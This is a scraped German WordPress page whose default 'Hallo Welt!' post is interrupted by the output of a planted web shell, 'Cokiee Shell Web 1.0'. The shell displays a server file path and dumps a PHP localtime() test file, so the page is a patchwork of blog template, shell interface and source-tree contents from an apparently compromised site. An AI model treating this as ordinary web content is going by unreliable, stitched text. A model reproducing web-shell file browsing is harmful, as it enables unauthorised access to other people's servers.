Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/date/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/date/tests/localtime_variation3.phpt |
--TEST-- Test localtime() function : usage variation - Passing higher positive and negetive float values to timestamp. --SKIPIF-- <?php if (PHP_INT_SIZE != 4) echo "skip this test is for 32-bit only"; ?> --FILE-- <?php /* Prototype : array localtime([int timestamp [, bool associative_array]]) * Description: Returns the results of the C system call localtime as an associative array * if the associative_array argument is set to 1 other wise it is a regular array * Source code: ext/date/php_date.c * Alias to functions: */ echo "*** Testing localtime() : usage variation ***\n"; date_default_timezone_set("UTC"); // Initialise function arguments not being substituted (if any) $is_associative = true; echo "\n-- Testing localtime() function with 'float 12.3456789000e10' to timestamp --\n"; $timestamp = 12.3456789000e10; var_dump( localtime($timestamp) ); var_dump( localtime($timestamp, $is_associative) ); echo "\n-- Testing localtime() function with 'float -12.3456789000e10' to timestamp --\n"; $timestamp = -12.3456789000e10; var_dump( localtime($timestamp) ); var_dump( localtime($timestamp, $is_associative) ); ?> ===DONE=== --EXPECTF-- *** Testing localtime() : usage variation *** -- Testing localtime() function with 'float 12.3456789000e10' to timestamp -- Warning: localtime() expects parameter 1 to be integer, float given in %s on line %d bool(false) Warning: localtime() expects parameter 1 to be integer, float given in %s on line %d bool(false) -- Testing localtime() function with 'float -12.3456789000e10' to timestamp -- Warning: localtime() expects parameter 1 to be integer, float given in %s on line %d bool(false) Warning: localtime() expects parameter 1 to be integer, float given in %s on line %d bool(false) ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare